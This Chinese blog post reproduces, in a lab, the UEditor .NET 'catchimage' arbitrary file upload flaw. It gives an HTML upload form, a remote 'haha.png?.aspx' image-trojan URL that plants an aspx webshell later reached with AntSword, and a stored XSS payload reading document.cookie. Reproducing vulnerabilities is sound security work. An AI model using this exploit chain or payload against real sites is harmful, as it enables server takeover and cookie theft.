网站首页 > 开源技术 正文
(一)测试者前言
在做HW前的资产自查时,发现某网站使用了uedior编辑器,且网站为net4.0,但是在实际渗透测试过程中,只挖掘到了存储型XSS,任意文件上传漏洞并没有利用成功。在测试任意文件上传时,远程的服务器没有接收到目标服务器的http请求,猜测目标服务器可能不出网。因为之前就听说过这个漏洞,一直没有测试过,所以想趁着这次复现一下利用过程。
(二)复现过程
01 使用windows2008服务器进行搭建
(1)若windows2008没有net4.0,则要提前下载安装;
注意:首先安装IIS,再安装net4.0 ,否则的话要在以下路径的目录下执行命令aspnet_regiis-i:C:\Windows\Microsoft.NET\Frameworkv4.0.30319\
(2)下载源码https://github.com/fex-team/ueditor
备注:这里直接选择utf8-net压缩包 就不用编译了。
02 解压及转换
解压到网站目录下,将net目录转换为应用程序。
03 应用程序转换后访问网站
首先判断是否存在任意文件的上传漏洞。其漏洞原理就是在抓取远程数据源的时候未对文件后缀名进行验证,导致了任意文件的写入漏洞。因此,我们可以在控制输入console.log(UE.version)的时候来判断编辑器的版本。
04 访问网站
访问以下网站,若出现下属情况则可以尝试漏洞利用:http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
05 本地构造一个html页面用于文件上传使用
<form
action="http://192.168.1.144/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
06 准备图片马
在服务器准备一个图片马,在shell add中填写图片马的地址如http://xx.xx.xx.xx/haha.png?.aspx ,绕过上传使其解析为aspx。
07 上传成功后,返回脚本木马的地址
点击submit,上传成功,直接返回aspx脚本木马的地址。
此时我们的远程服务器也会有请求,可以以此来判断目标机器出网情况。
使用蚁剑即可连接成功。
此外还存在存储型XSS漏洞,如下图所示:
抓包删除掉<p>标签后写入:
payload %3Cp%3E1111"><ImGsRc=1 OnErRoR=prompt(document.cookie)>%3Cbr%2F%3E%3C%2Fp%3E
08 成功触发存储XSS
(三)测试者总结
在资产自查中发现了这个编辑器漏洞,但却没有利用成功,所以才想复测一下,利用的过程挺简单的,就是在环境搭建中遇到了很多问题,如刚开始先安装了net4.0再安装ISS,然后网站目录访问的权限问题,好在最后都被一一解决了。
猜你喜欢
- 2024-09-28 织梦 安装UEditor编辑器(织梦安装出现dir)
- 2024-09-28 springboot整合百度富文本 UEditor
- 2024-09-28 前端视角漫谈百度ueditor编辑器前后端分离配置
- 2024-09-28 Ueditor二次编辑word(doc和docx格式),SpringBoot后端
- 2024-09-28 部署到服务器UEditor乱码,layUI乱码,layer乱码「非编码造成」
- 2024-09-28 百度编辑器ueditor,如何在源码模式与富文本模式相互切换
- 2024-09-25 Python项目中用富文本编辑器展示精美网页
- 2024-09-25 UEditor二次开发之为行内代码添加code标签
- 2024-09-25 百度编辑器ueditor从word粘贴图片重复分析
- 2024-09-25 利用百度编辑器ueditor实现代码高亮
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- jdk (81)
- putty (66)
- rufus (78)
- 内网穿透 (89)
- okhttp (70)
- powertoys (74)
- windowsterminal (81)
- netcat (65)
- ghostscript (65)
- veracrypt (65)
- asp.netcore (70)
- wrk (67)
- aspose.words (80)
- itk (80)
- ajaxfileupload.js (66)
- sqlhelper (67)
- express.js (67)
- phpmailer (67)
- xjar (70)
- redisclient (78)
- wakeonlan (66)
- tinygo (85)
- startbbs (72)
- webftp (82)
- vsvim (79)
本文暂时没有评论,来添加一个吧(●'◡'●)